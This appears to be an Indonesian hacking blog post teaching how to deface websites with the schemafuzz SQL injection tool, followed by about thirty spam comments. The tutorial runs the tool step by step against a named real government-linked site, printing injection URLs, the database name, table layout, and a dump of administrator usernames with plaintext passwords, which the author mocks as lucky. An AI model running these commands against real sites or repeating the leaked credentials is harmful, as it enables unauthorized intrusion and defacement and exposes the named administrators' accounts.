New..!! AhmadBj Blogs Was Reborn..!! Visit US..!!

Adsense

Deface web dengan schemafuz


 kali ini ini penulis akan menulis mengenai deface menggunakan schemafuz..oke langsung saja ke TKP...

Bahan2 yang musti di siapin...

1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2.Schemafuzz (http://rup.ee/schemafuzzy.py)
3.CMD

buka cmd masuk ke folder tempat schemafuzz.py berada...
ketikkan -> schemafuzz.py -u "url target" --perintah (list perintah ada di bawah)
1. masukkan target
saya contohkan target adalah ->
http://www.ditplb.or.id/profile.php?id=1

2.Masukkan perintah untuk mencari colom name
contoh: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1" --findcol
Maka keluar:

[+] URL: http://www.ditplb.or.id/profile.php?id=1----
[+]
Evasion Used: "+" "--"

[+] 20:36:29

[-] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 0,1,2,
[+] Column Length is: 3

[+] Found null column at column #: 2

[+] SQLi URL: http://www.ditplb.or.id/profile.php?id ... CT+0,1,2--

[+] darkc0de
URL: http://www.ditplb.or.id/profile.php?id ... 1,darkc0de
[-] Done!






ternyata ada 2 kolom.
Berarti kita gunain http://www.ditplb.or.id/profile.php?id ... 1,darkc0de untuk inject

3.Cari database dg command --dbs
contoh : schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de " --dbs
Maka keluar:


Code:

[+] URL: http://www.ditplb.or.id/profile.php?id ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 2032

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: t15618_plb
User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0] t15618_plb


[-] 2039

[-] Total URL Requests 3

[-] Done


disitu udah keliatan nama DBnya??? t15618_plb

4.Cari nama table dalam database
contoh: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de " --schema -D namadatabase
Jadinya: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de " --schema -D t15618_plb
Maka keluar:
Code:

[+] URL: http://www.ditplb.or.id/profile.php?id ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:43:10

[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...

Database: t15618_plb

User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11
[Database]: t15618_plb
[table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keteran gan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] 20:44:39
[-] Total URL Requests 43
[-] Done


Berarti web itu mempunyai 11 tabel.... n nama kolomnya juga udah ada..... tinggal pilih deh mana yang mau ditelanjangin...hhehehe (emg cewek ) :P

5.Melihat isi dari suatu tabel n kolom
contohl :schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de " --dump -D namadatabase -T namatable -C namakolom
Jadinya :schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de " --dump -D t15618_plb -T user -C ID_user,UserID,Password,Keterangan,Admin
Maka keluar:
Code:

[+] URL: http://www.ditplb.or.id/profile.php?id ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:53:46

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: t15618_plb

User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8

[+] Dumping data from database "t15618_plb" Table "user"

[+] and Column(s) ['ID_user', 'UserID', 'Password', 'Keterangan', 'Admin']

[+] Number of Rows: 13


[0] 1:direktur:direkturplbirektur PLB:Admin Direktur PLB:

[1] 2:yusuf:siplb:Achmad Yusuf:Admin Achmad Yusuf:

[2] 3:abdulmukti:fatmawatimukti: P. Abdul Mukti:Admin P. Abdul Mukti:

[3] 4:harryrogkal: ProgKAL:Admin ProgKAL:

[4] 5:samino:kurikulum:Kurikulum:Admin Kurikulum:

[5] 6:mugiarsih:manajemen:Manajemen:Admin Manajemen:

[6] 7:sutopo:kesiswaan:Kesiswaan:Admin Kesiswaan:

[7] 8:winarno:sarana:Sarana:Admin Sarana:

[8] 9:sanusi:tatausaha:Tata Usaha:Admin Tata Usaha:

[9] 10:sutji:evaluasi:Evaluasi:Admin Evaluasi:

[10] 11:thamrin:informatika:Informatika:Admin Informatika:

[11] 12:adjie:kerjasama:Kerjasama:Admin Kerjasama:

[12] 13:media:media:Media:Admin Media:

[13] No data

[-] 20:54:14

[-] Total URL Requests 15

[-] Done


Oops... kok user id n passwordnya gak di encrypt ya...........mungkin ini rejeki kita biar gak susah2 decryptnya

Cara diatas berlaku untuk sql versi 5 , untuk versi 4 gunakan perintah --fuzz untuk menemukan nama tabel n kolom
contoh:schemafuzz.py -U "http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de " --fuzz

34 Responses to "Deface web dengan schemafuz"

  1. I cοuld not refrаin frоm commentіng.
    Well written!

    My website :: pikavippi
    Also visit my webpage - pikavippi

    ReplyDelete
  2. Sweеt blog! I founԁ it while ѕeаrching оn Yahoο
    Newѕ. Do уou have аny tips on how to get listed in Υahoo News?
    Ӏ've been trying for a while but I never seem to get there! Thank you

    My homepage ... www.askaboutrisk.com
    Feel free to visit my site - uqm

    ReplyDelete
  3. nice tutor....
    tp gag ngerti..hehe...
    :: Iyoshare::
    iyoshare.blogspot.com

    ReplyDelete
  4. Do you have any video of that? I'd love to find out some additional information.
    Look into my weblog : novi sad laptop servis

    ReplyDelete
  5. Hi, I think your site could possibly be having web browser compatibility issues.
    Whenever I look at your site in Safari, it looks fine however when opening in I.
    E., it has some overlapping issues. I merely wanted to give you a
    quick heads up! Besides that, wonderful website!



    My web blog; get-plus-followers.com

    ReplyDelete
  6. Hey would you mind sharing which blog platform you're working with? I'm planning to start my own blog in
    the near future but I'm having a tough time deciding between BlogEngine/Wordpress/B2evolution and Drupal. The reason I ask is because your design seems different then most blogs and I'm looking
    for something unique. P.S Sorry for being off-topic but I had
    to ask!

    my webpage aaa fx

    ReplyDelete
  7. I'm impressed, I must say. Seldom do I encounter a blog that's both
    educative and engaging, and without a doubt, you have hit the nail on the head.

    The issue is something which not enough people are speaking intelligently about.
    Now i'm very happy that I came across this during my hunt for something relating to this.

    Feel free to surf to my web page; marketing twitter
    Also see my web site - best-retweet.com

    ReplyDelete
  8. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my
    blog that automatically tweet my newest twitter updates.

    I've been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

    my weblog how can i get twitter followers

    ReplyDelete
  9. It's really a great and helpful piece of info. I'm glad that you
    simply shared this helpful information with us. Please stay us informed like
    this. Thanks for sharing.

    Feel free to surf to my site ... get followers

    ReplyDelete
  10. There's certainly a great deal to know about this issue. I really like all the points you have made.

    Also visit my web-site get followers

    ReplyDelete
  11. This is really fascinating, You are an excessively skilled blogger.
    I've joined your feed and look ahead to in quest of more of your wonderful post. Also, I have shared your site in my social networks

    Look at my blog post - get followers

    ReplyDelete
  12. What a stuff of un-ambiguity and preserveness of precious knowledge on the topic of unexpected emotions.


    my page; get followers

    ReplyDelete
  13. Hello, i think that i saw you visited my weblog thus i came to “return the favor”.
    I am trying to find things to improve my site!I suppose its ok
    to use a few of your ideas!!

    Review my web site :: your instagram url

    ReplyDelete
  14. I rarely write remarks, but i did a few searching and wound up here "Deface web dengan schemafuz".
    And I actually do have 2 questions for you if you tend not to mind.
    Could it be only me or does it look as if like
    some of these remarks come across like written
    by brain dead visitors? :-P And, if you are
    posting on additional places, I'd like to follow everything fresh you have to post. Would you make a list of the complete urls of your shared sites like your twitter feed, Facebook page or linkedin profile?

    Feel free to surf to my web blog - get followers

    ReplyDelete
  15. Wow, this piece of writing is gοοd, my siѕter is
    analyzіng such things, thereforе I am goіng to conѵey
    her.

    Мy web site - diamondlinks review

    ReplyDelete
  16. Very nice post. I just stumbled upon your weblog and wanted to say that I have truly enjoyed surfing around your
    blog posts. In any case I'll be subscribing to your rss feed and I hope you write again soon!

    Check out my site ... online reputation management software

    ReplyDelete
  17. Yes! Finally someone writes about Battle Camp hack.

    ReplyDelete
  18. I do not know if it's just me or if everyone else experiencing problems with your
    website. It appears like some of the written text within your content
    are running off the screen. Can somebody else please provide feedback and let
    me know if this is happening to them too? This may be a problem with my
    browser because I've had this happen before. Appreciate it

    Also visit my site; paid surveys; paidsurveysb.tripod.com,

    ReplyDelete
  19. Valuable info. Lucky me I discovered your
    web site by accident, and I'm surprised why this
    coincidence did not came about in advance!
    I bookmarked it.

    Look at my weblog - Quest Bars

    ReplyDelete
  20. Admiring the time and effort you put into your site and detailed information you offer.
    It's nice to come across a blog every once in a while that isn't the same old rehashed material.
    Wonderful read! I've saved your site and I'm including your
    RSS feeds to my Google account.

    My homepage - Minecraft games

    ReplyDelete
  21. Hello there! I could have sworn I've visited this web site before
    but after browsing through many of the posts I realized it's new to me.

    Anyways, I'm certainly delighted I discovered it and I'll be book-marking it and checking back frequently!


    My web blog :: free music downloads - http://twitter.com/Music0Downloads/status/596035206915559424 -

    ReplyDelete
  22. Peculiar article, exactly what I was looking for.


    Here is my web page; minecraft.net

    ReplyDelete
  23. Hello to all, the contents present at this web page are really remarkable for people experience, well, keep up the
    nice work fellows.

    Also visit my blog Dating Sites (Http://Bestdatingsitesnow.Com)

    ReplyDelete
  24. Fabulous, what a website it is! This webpage presents valuable facts diet plans for women to lose
    weight (http://dietplansforwomentoloseweightfast.com) us,
    keep it up.

    ReplyDelete
  25. Hey just wanted to give you a brief heads up and let you know a few of the pictures aren't loading correctly.
    I'm not sure why but I think its a linking issue.

    I've tried it in two different browsers and both show
    the same outcome.

    My web site - free music downloads (freemusicdownloadsb.com)

    ReplyDelete
  26. Thanks a bunch for sharing this with all folks you actually recognize what you are
    talking approximately! Bookmarked. Kindly
    additionally consult with my web site =). We could have a link exchange contract among us

    Have a look at my web-site: Minecraft Games

    ReplyDelete
  27. Nice weblog right here! Additionally your site lots up very fast!
    What web host are you the usage of? Can I am getting your affiliate hyperlink to
    your host? I want my web site loaded up
    as fast as yours lol

    Review my page; dating sites (http://bestdatingsitesnow.com)

    ReplyDelete
  28. Heya exceptional blog! Does running a blog like this require a great deal
    of work? I've very little expertise in computer programming but I was hoping to start my own blog soon. Anyway, should
    you have any recommendations or techniques Diet Plans For
    Women To Lose Weight (Dietplansforwomentoloseweightfast.Com)
    new blog owners please share. I understand this is off topic however I just needed to ask.
    Cheers!

    ReplyDelete
  29. But the rot has now spread with parts of their books Mellisa Helphinstine if the interest rate
    is usually to high then a small business cannot desire to pay such amount.

    ReplyDelete
  30. Recent consumer awareness researchers have attempted in promoting to consumers the need for trying to find a good motor loan before approaching a dealer Charla Raelson the quantity of monthly lease rentals could be small but at the end of the lease tenure, you could have spent a big sum of
    income for nothing.

    ReplyDelete
  31. Please let me know if you're looking for a
    article author for your weblog. You have some really good posts and I
    feel I would be a good asset. If you ever want to
    take some of the load off, I'd really like to write some material for your blog in exchange for a link
    back to mine. Please shoot me an e-mail if interested.
    Regards!

    Here is my homepage: CarlotaOGiard

    ReplyDelete
  32. May I simply just say what a relief to discover
    someone who genuinely knows what they are discussing online.
    You definitely understand how to bring an issue to light and make it important.
    More and more people must look at this and understand this side
    of the story. It's surprising you're not more popular given that you surely possess the
    gift.

    Feel free to visit my homepage ... DanikaAOdonahue

    ReplyDelete
  33. I was pretty pleased to uncover this page.
    I need to to thank you for your time due to this fantastic read!!
    I definitely loved every little bit of it and I have
    you saved as a favorite to check out new stuff on your website.


    my webpage quest bars

    ReplyDelete
  34. Everything is very open with a really clear clarification of the issues.

    It was definitely informative. Your site is very useful.
    Thanks for sharing!

    Also visit my homepage; quest bars

    ReplyDelete

untuk berkomentar:
1. setelah Anda membaca artikel ini anda wajib komentar
2. komentar anda sangat saya harapkan
3.komentar anda sangatlah penting demi kemajuan blog kita
4. komentar anda bagaikan berlian yang tak ternilai harganya
5. Cantumkan link blog anda apabila anda berkomentar, agar blog anda ikut naik trafic nya

Followers

Like Us On Facebook